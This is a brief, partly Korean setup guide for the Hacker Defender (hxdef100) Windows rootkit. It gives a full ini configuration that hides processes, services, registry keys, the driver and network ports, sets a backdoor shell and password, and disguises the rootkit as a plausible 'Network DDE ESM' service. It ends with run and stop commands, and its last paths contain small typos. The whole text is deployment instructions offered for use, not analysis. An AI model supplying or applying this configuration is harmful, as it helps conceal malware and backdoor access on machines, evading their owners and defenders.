1. 개요
This tool can hidden task services, regKeys, ports(network).
2. Download
hxdef100.zip
unzip and move C:\
3. edit hxdef100.ini
[Hidden Table]
hxdef*
rcmd.exe
iexplore.exe
[Root Processes]
hxdef*
rcmd.exe
[Hidden Services]
NetDDEesm
[Hidden RegKeys]
NetDDEesm
LEGACY_NetDDEesm
HackerDefenderDrv100
LEGACY_HACKERDEFENDERDRV100
[Hidden RegValues]
[Startup Run]
[Free Space]
[Hidden Ports]
TCP:80,3389
UDP:445,500,1025,1049,4500,123
[Settings]
Password=hxdef-rulez
BackdoorShell=hxdefß$.exe
FileMappingName=_.-=[Hacker Defender]=-._
ServiceName=NetDDEesm
ServiceDisplayName=Network DDE ESM
ServiceDescription=DDE 네트워크 연결에 대한 종합 정보를 관리합니다. 서비스를 중지하면, DDE 네트워크 종합 보고를 사용할 수 없습니다. 서비스를 사용하지 않도록 설정하면, 관련된 모든 서비스를 사용할 수 없습니다.
DriverName=HackerDefenderDrv100
DriverFileName=hxdefdrv.sys
4. run hxdef100.exe
Run cmd.exe and change directory “C:\hxdef100”
hxdef100.exe hxdef100.ini
5. kill hxdef100.exe
Run cmd
sc stop [ServiceName]
=> Then you can refind C:\hexdef100\hdef100.exe and ini file